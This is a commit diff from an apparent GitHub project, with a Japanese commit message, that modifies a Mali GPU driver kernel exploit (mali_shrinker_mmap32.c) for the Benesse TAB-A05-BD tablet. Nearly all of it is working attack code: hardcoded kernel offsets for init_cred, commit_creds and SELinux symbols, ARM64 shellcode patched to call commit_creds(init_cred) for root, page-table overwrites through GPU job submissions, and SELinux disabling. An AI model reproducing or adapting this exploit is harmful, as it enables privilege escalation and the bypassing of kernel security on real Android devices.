onyxのオフセットを修正しただけのものに戻し、usleepの間隔を長くする

Signed-off-by: yuu <[email protected]>
SmileTabLabo · May 14, 2024 · 8805c63 · 8805c63
1 parent b92230d
commit 8805c63
Show file tree

Hide file tree

Showing 2 changed files with 30 additions and 66 deletions.
diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
@@ -62,27 +62,20 @@
 
 #define ADD_COMMIT_INDEX 3
 
-
 // TAB-A05-BD
 #define SELINUX_ENFORCING_neo 0x129d9bc
-#define SEL_READ_HANDLE_UNKNOWN_neo 0x365d80 // 0xffffff80083e5d80 - 0xffffff8008080000 = 0x365d80 
-#define SEL_READ_ENFORCE_neo 0x3653a8//0xffffff80083e53a8 - 0xffffff8008080000 = 0x3653A8//add
-#define INIT_CRED_neo 0x11553f0 //0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553F0
+#define SEL_READ_HANDLE_UNKNOWN_neo 0x365d80 // 0xffffff80083e5d80 - 0xffffff8008080000 = 0x365d80
+#define INIT_CRED_neo 0x11553f0 //0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553f0
 #define COMMIT_CREDS_neo 0x5a120 //0xffffff80080da120 - 0xffffff8008080000 = 0x5a120
 #define ADD_INIT_neo 0x910FC000 
 #define ADD_COMMIT_neo 0x91048108
-//avc_denied.isra.4
-#define AVC_DENY_neo 0x35acc8//0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add
-//kallsymsがアドレスを吐くようにする
-static uint64_t kptr_restrict = 0x1147178;
-//検証用
-static uint32_t stack_error = 0x14000021;
-
+#define AVC_DENY_neo 0x35acc8//0xffffff80083dacc8 - 0xffffff8008080000 = 0x35acc8
 
 static uint64_t sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_neo;
-static uint64_t sel_read_enforce = SEL_READ_ENFORCE_neo;
+
 static uint64_t selinux_enforcing = SELINUX_ENFORCING_neo;
-//added
+
+//static uint64_t avc_deny = 0x2CCC28;
 static uint64_t avc_deny = AVC_DENY_neo;
 static uint64_t  selinux_enforcing_READ = 0X0;
 static uint64_t  selinux_enforcing_WRITE = 0X0;
@@ -454,7 +447,7 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
 }
 
 void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
-  printf("Run fixup_root_shell");
+
   uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
   //Sets x0 to init_cred
   root_code[ADRP_INIT_INDEX] = init_adpr;
@@ -466,11 +459,8 @@ void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_en
   root_code[5] = 0xd63f0100; // blr x8
   root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
   root_code[7] = 0xd65f03c0; // ret
-  printf("Run fixup_root_shell_un\n");
 }
 
-
-
 void fixup_root_shell_nop() {
 
   //Sets x0 to init_cred
@@ -486,7 +476,7 @@ void fixup_root_shell_nop() {
 }
 
 void fixup_root_shell_un(uint64_t init_cred, uint64_t commit_cred, uint64_t read_handle_unknown, uint32_t add_init, uint32_t add_commit) {
-  printf("Run fixup_root_shell_un\n");
+
   uint32_t init_adpr = write_adrp(0, read_handle_unknown, init_cred);
   //Sets x0 to init_cred
   root_code_un[ADRP_INIT_INDEX] = init_adpr;
@@ -498,11 +488,9 @@ void fixup_root_shell_un(uint64_t init_cred, uint64_t commit_cred, uint64_t read
   root_code_un[5] = 0xd63f0100; // blr x8
   root_code_un[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
   root_code_un[7] = 0xd65f03c0; // ret
-  printf("End fixup_root_shell_un");
 }
 
 
-
 uint64_t set_addr_lv3(uint64_t addr) {
   uint64_t pfn = addr >> PAGE_SHIFT;
   pfn &= ~ 0x1FFUL;
@@ -545,7 +533,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
   if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
     err(1, "submit job failed\n");
   }
-  usleep(10000);
+  usleep(500000);
 }
 
 void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, uint64_t value, enum mali_write_value_type type) {
@@ -625,8 +613,7 @@ int run_enforce_un() {
   printf("run_enforce_un: before sleep\n");
   sleep(3);
   printf("run_enforce_un: after sleep\n");
-  //int enforce_fd = open("/sys/fs/selinux/deny_unknown", O_RDONLY);
-  int enforce_fd = open("/sys/fs/selinux/reject_unknown", O_RDONLY);
+  int enforce_fd = open("/sys/fs/selinux/deny_unknown", O_RDONLY);
   printf("run_enforce_un: open\n");
   read(enforce_fd, &result, 1);
   printf("run_enforce_un: after read\n");
@@ -642,15 +629,14 @@ void select_offset() {
   int len = __system_property_get("ro.build.fingerprint", fingerprint);
   LOG("fingerprint: %s\n", fingerprint);
 
-/*
   if (!strcmp(fingerprint, "benesse/TAB-A05-BD/TAB-A05-BD:9/01.00.000/01.00.000:user/release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_neo;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_neo;
-    //fixup_root_shell(INIT_CRED_neo, COMMIT_CREDS_neo, SEL_READ_HANDLE_UNKNOWN_neo, ADD_INIT_neo, ADD_COMMIT_neo);
-    fixup_root_shell_un(INIT_CRED_neo, COMMIT_CREDS_neo, SEL_READ_HANDLE_UNKNOWN_neo, ADD_INIT_neo, ADD_COMMIT_neo);
+    fixup_root_shell(INIT_CRED_neo, COMMIT_CREDS_neo, SEL_READ_HANDLE_UNKNOWN_neo, ADD_INIT_neo, ADD_COMMIT_neo);
     return;  
   }
-*/
+
+
 
   if (1) {
 //    avc_deny = 0x321C64; //  avc_denied.isra.6
@@ -660,8 +646,7 @@ void select_offset() {
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_neo;
     //fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_WRITE, 0x910FC000, 0x910CA108);
 //    fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_READ, 0x910FC000, 0x910CA108);
-    //fixup_root_shell_un(INIT_CRED_neo, COMMIT_CREDS_neo, sel_read_handle_unknown, ADD_INIT_neo, ADD_COMMIT_neo);
-    fixup_root_shell(INIT_CRED_neo, COMMIT_CREDS_neo, sel_read_enforce, ADD_INIT_neo, ADD_COMMIT_neo);
+    fixup_root_shell_un(INIT_CRED_neo, COMMIT_CREDS_neo, sel_read_handle_unknown, ADD_INIT_neo, ADD_COMMIT_neo);
     return;
   }
   err(1, "unable to match build id\n");
@@ -679,24 +664,9 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
   //Go through the reserve pages addresses to write to avc_denied with our own shellcode
   write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
-/*for onyx
-void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
 
- uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
-  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-
-  usleep(100000);
-  
-  //Call commit_creds to overwrite process credentials to gain root
-  write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t));
-//  write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
-//    write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
-}
-*/
-//original code(avc_deny)
 void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
-  /* Skip this
-  uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+/*  uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
   usleep(100000);
@@ -706,15 +676,25 @@ void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved
   //Triggers avc_denied to disable SELinux
   open("/dev/kmsg", O_RDONLY);
   */
-  uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
-  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+//  uint64_t sel_read_enforce_addr = (((selinux_enforcing_READ + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
+//  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+//  printf("sel_read_enforce_addr is %llx  avc_deny_addr is %llx\n", sel_read_enforce_addr, avc_deny_addr);
 
+ uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+//  uint64_t sel_write_enforce_addr = (((selinux_enforcing_WRITE + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
+//  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_write_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+  usleep(100000);
+
   //Call commit_creds to overwrite process credentials to gain root
-  //write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));// 検証のためコメントアウト
-  //stack_errorが発生するか検証
-    write_data(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, stack_error, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+  write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t));
+//  write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+//    write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
 }
 
+
 void spray(int mali_fd) {
     for (int j = 0; j < SPRAY_NUM; j++) {
         union kbase_ioctl_mem_alloc alloc = {0};
@@ -738,20 +718,6 @@ void spray(int mali_fd) {
 
 }
 
-void write_kptr_restrict(int mali_fd, int mali_fd2, uint64_t pgd,
-                   uint64_t* reserved) {
-  uint64_t kptr_restrict_addr =
-      (((kptr_restrict + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
-  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t),
-           kptr_restrict_addr, atom_number++,
-           MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-
-  usleep(300000);
-  // shellcode
-  write_data(mali_fd2, kptr_restrict, reserved,
-             TOTAL_RESERVED_SIZE / RESERVED_SIZE, 0,
-             MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
-}
 int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
   if (*flush_idx + NUM_TRIALS > FLUSH_REGION_SIZE) {
     err(1, "Out of memory.");
@@ -799,8 +765,6 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
       atom_number++;
       write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0]));
       usleep(100000);
-      write_kptr_restrict(mali_fd, mali_fd2, pgd, &(reserved[0]));
-	  usleep(100000);
       write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));	
       usleep(100000);
       printf("time to run_enforce\n");

diff --git a/onyx_shrinker b/onyx_shrinker